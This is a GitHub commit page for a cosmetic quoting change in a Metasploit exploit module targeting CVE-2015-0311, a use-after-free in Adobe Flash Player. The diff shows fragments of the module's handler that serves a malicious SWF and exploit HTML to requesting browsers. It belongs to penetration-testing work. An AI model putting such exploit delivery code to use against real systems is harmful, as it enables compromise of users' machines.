Skip to content

Commit 78167c3

Browse files
committed
Use single quotes when possible
1 parent cb72b26 commit 78167c3

File tree

1 file changed

+4
-4
lines changed

1 file changed

+4
-4
lines changed

modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uaf.rb

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -33,7 +33,7 @@ def initialize(info={})
3333
['CVE', '2015-0311'],
3434
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-01.html'],
3535
['URL', 'http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/'],
36-
['URL', 'http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/' ]
36+
['URL', 'http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/']
3737
],
3838
'Payload' =>
3939
{
@@ -66,12 +66,12 @@ def on_request_exploit(cli, request, target_info)
6666
print_status("Request: #{request.uri}")
6767

6868
if request.uri =~ /\.swf$/
69-
print_status("Sending SWF...")
69+
print_status('Sending SWF...')
7070
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
7171
return
7272
end
7373

74-
print_status("Sending HTML...")
74+
print_status('Sending HTML...')
7575
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
7676
end
7777

@@ -98,7 +98,7 @@ def exploit_template(cli, target_info)
9898
end
9999

100100
def create_swf
101-
path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2015-0311", "msf.swf" )
101+
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0311', 'msf.swf')
102102
swf = ::File.open(path, 'rb') { |f| swf = f.read }
103103

104104
swf

0 commit comments

Comments
 (0)